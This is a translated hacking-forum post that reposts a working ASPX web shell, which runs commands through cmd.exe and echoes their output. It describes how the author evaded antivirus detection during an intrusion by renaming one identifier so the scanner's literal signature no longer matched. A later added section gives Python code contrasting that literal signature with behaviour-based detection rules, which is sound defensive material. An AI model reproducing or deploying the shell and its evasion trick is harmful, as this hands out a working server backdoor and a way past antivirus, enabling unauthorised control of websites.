Today I saw that 华夏BLOG had been hacked... followed the address that was left behind to take a look... there is an article I'm reposting from there... sigh, I'm still too much of a noob.
While hacking a site today, the aspx shell I normally use would not upload no matter what, so I concluded it was being flagged by the antivirus.
To escalate privileges you need an aspx shell, so what now? I could not find an undetected one anywhere online. With no other option, I had to find the signature the scanner was matching inside the shell myself.
It took a lot of trying, but I finally found it. LOOK:
```vb
<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
' Runs whatever was typed into the Cmd textbox through the interpreter named in
' cmdPath (normally cmd.exe) and echoes the captured standard output into the
' result label. This is the version that gets flagged.
Sub RunCMD(Src As Object, E As EventArgs)
    Dim myProcess As New Process()
    Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
    myProcessStartInfo.UseShellExecute = False
    ' The line below is the one the scanner keys on.
    myProcessStartInfo.RedirectStandardOutput = true
    myProcess.StartInfo = myProcessStartInfo
    myProcessStartInfo.Arguments = "/c " & Cmd.Text
    myProcess.Start()
    Dim myStreamReader As StreamReader = myProcess.StandardOutput
    Dim myString As String = myStreamReader.ReadToEnd()
    myProcess.Close()
    ' HTML-escape the output before echoing it. Reconstructed: the extracted page
    ' had the &lt; / &gt; entity references collapsed to bare < and >.
    myString = Replace(myString, "<", "&lt;")
    myString = Replace(myString, ">", "&gt;")
    result.Text = "Command = " & Cmd.Text & vbCrLf & "<ul class='td3'><pre>" & myString & "</pre></ul>"
    Cmd.Text = ""
End Sub
</script>
<!-- Page directives and the form controls the Sub references were added so the
     fragment compiles as a stand-alone page; the original post shows only the Sub. -->
<form runat="server">
    <asp:TextBox id="cmdPath" runat="server" Text="c:\windows\system32\cmd.exe" />
    <asp:TextBox id="Cmd" runat="server" />
    <asp:Button id="Run" runat="server" Text="Run" OnClick="RunCMD" />
    <asp:Label id="result" runat="server" />
</form>
```
This is the code that gets flagged. More precisely, the line myProcessStartInfo.RedirectStandardOutput = true is what trips the scanner.
But privilege escalation needs cmd.net, and simply deleting that line does not work either (without RedirectStandardOutput = true the process's StandardOutput stream cannot be read back, so the shell returns nothing). My workaround was to rename myProcess; the code above, for example, becomes:
```vb
' Drop-in replacement for the Sub above: same behaviour, only the identifier changed.
Sub RunCMD(Src As Object, E As EventArgs)
    Dim myRedzz As New Process()
    Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text)
    myRedzzStartInfo.UseShellExecute = False
    myRedzzStartInfo.RedirectStandardOutput = true
    myRedzz.StartInfo = myRedzzStartInfo
    myRedzzStartInfo.Arguments = "/c " & Cmd.Text
    myRedzz.Start()
    Dim myStreamReader As StreamReader = myRedzz.StandardOutput
    Dim myString As String = myStreamReader.ReadToEnd()
    myRedzz.Close()
    ' HTML-escape the output before echoing it (reconstructed; the extracted page
    ' had the &lt; / &gt; entity references collapsed to bare < and >).
    myString = Replace(myString, "<", "&lt;")
    myString = Replace(myString, ">", "&gt;")
    result.Text = "Command = " & Cmd.Text & vbCrLf & "<ul class='td3'><pre>" & myString & "</pre></ul>"
    Cmd.Text = ""
End Sub
```
The only change is myProcess → myRedzz (which also renames myProcessStartInfo), so the flagged line now reads myRedzzStartInfo.RedirectStandardOutput = true, the exact literal the scanner was matching no longer appears in the file, and the shell is no longer detected.
That does not mean it is absolutely undetectable, though. Every antivirus product is different, so it takes continued trial and error.
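Added example, written for this page rather than taken from the original post: the scanner above keyed on one literal line that happened to include a variable name, which is why a rename was enough. A rule written against the .NET calls a command shell cannot do without (a ProcessStartInfo, RedirectStandardOutput set, Start(), and a read from StandardOutput) survives the rename. The Python below contrasts the two rules over constructed samples: the literal rule flags only the original, the API-based rule flags the original, the renamed copy and a lower-cased, comment-laden variant, and clears a page that launches a fixed process without capturing its output. Sample file contents, the benign page and the rule names are assumptions for the demonstration.

```python
import re

# Constructed test inputs (not taken from any real site). ORIGINAL_SHELL follows
# the shape of the shell discussed above; RENAMED_SHELL applies the post's rename;
# OBFUSCATED_SHELL keeps the behaviour but changes case, names and layout;
# BENIGN_PAGE launches a process without feeding it request data or reading output.
ORIGINAL_SHELL = """
Sub RunCMD(Src As Object, E As EventArgs)
    Dim myProcess As New Process()
    Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
    myProcessStartInfo.UseShellExecute = False
    myProcessStartInfo.RedirectStandardOutput = true
    myProcess.StartInfo = myProcessStartInfo
    myProcessStartInfo.Arguments = "/c " & Cmd.Text
    myProcess.Start()
    Dim myStreamReader As StreamReader = myProcess.StandardOutput
    Dim myString As String = myStreamReader.ReadToEnd()
    myProcess.Close()
    result.Text = "Command = " & Cmd.Text & vbCrLf & "<ul class='td3'><pre>" & myString & "</pre></ul>"
End Sub
"""

# The post's evasion: one identifier renamed (this also renames myProcessStartInfo).
RENAMED_SHELL = ORIGINAL_SHELL.replace("myProcess", "myRedzz")

OBFUSCATED_SHELL = """
sub runcmd(src as object, e as eventargs)
    dim p as new process()   ' short names, no casing, trailing comments
    dim psi as new processstartinfo(cmdpath.text)
    psi.useshellexecute = false
    psi.REDIRECTSTANDARDOUTPUT = TRUE
    p.startinfo = psi
    psi.arguments = "/c " & cmd.text
    p.start()
    dim s as string = p.standardoutput.readtoend()
    result.text = "<pre>" & s & "</pre>"
end sub
"""

BENIGN_PAGE = """
Sub Page_Load(Src As Object, E As EventArgs)
    ' Kick off a fixed maintenance job; nothing from the request reaches it
    ' and nothing it prints is returned to the browser.
    Dim p As New Process()
    p.StartInfo = New ProcessStartInfo("C:\\tools\\logrotate.exe", "--quiet")
    p.Start()
End Sub
"""

# VB is case-insensitive and whitespace-tolerant, so match on a canonical form:
# string literals kept intact (an apostrophe inside "..." is not a comment),
# ' comments dropped, whitespace collapsed, everything lower-cased.
_STRING_OR_COMMENT = re.compile(r'"[^"\n]*"|(\'[^\n]*)')
_WHITESPACE = re.compile(r"\s+")


def normalize(source):
    def drop_comment(m):
        return "" if m.group(1) is not None else m.group(0)
    stripped = _STRING_OR_COMMENT.sub(drop_comment, source)
    return _WHITESPACE.sub(" ", stripped).strip().lower()


# The literal the post found the scanner keyed on; any rename breaks it.
LITERAL_SIGNATURE = "myProcessStartInfo.RedirectStandardOutput = true"

# API calls a command-execution shell cannot rename away; all four must be present.
REQUIRED_API = {
    "startinfo_built": r"\bnew processstartinfo\s*\(",
    "stdout_redirected": r"\.redirectstandardoutput\s*=\s*true\b",
    "process_started": r"\.start\s*\(\s*\)",
    "stdout_read": r"\.standardoutput\b",
}

# Corroborating indicator: request-controlled text flows into the argument string.
USER_INPUT_TO_ARGS = r"\.arguments\s*=\s*[^\n]{0,80}?(\.text\b|request\b)"


def literal_match(source):
    return LITERAL_SIGNATURE in source


def api_hits(source):
    text = normalize(source)
    return {name: re.search(pat, text) is not None for name, pat in REQUIRED_API.items()}


def classify(source):
    text = normalize(source)
    return {
        "literal": literal_match(source),
        "behavioural": all(api_hits(source).values()),
        "user_input_to_args": re.search(USER_INPUT_TO_ARGS, text) is not None,
    }


if __name__ == "__main__":
    samples = [("original", ORIGINAL_SHELL), ("renamed", RENAMED_SHELL),
               ("obfuscated", OBFUSCATED_SHELL), ("benign", BENIGN_PAGE)]
    for name, sample in samples:
        print(f"{name:10s} {classify(sample)}")
```

The point of the four-call rule is that a shell can change every name it controls but not the names of the framework members it calls; a real scanner would also decode the page (the `Replace` into entities, string concatenation, `Eval`-style indirection) before matching, which this example leaves out.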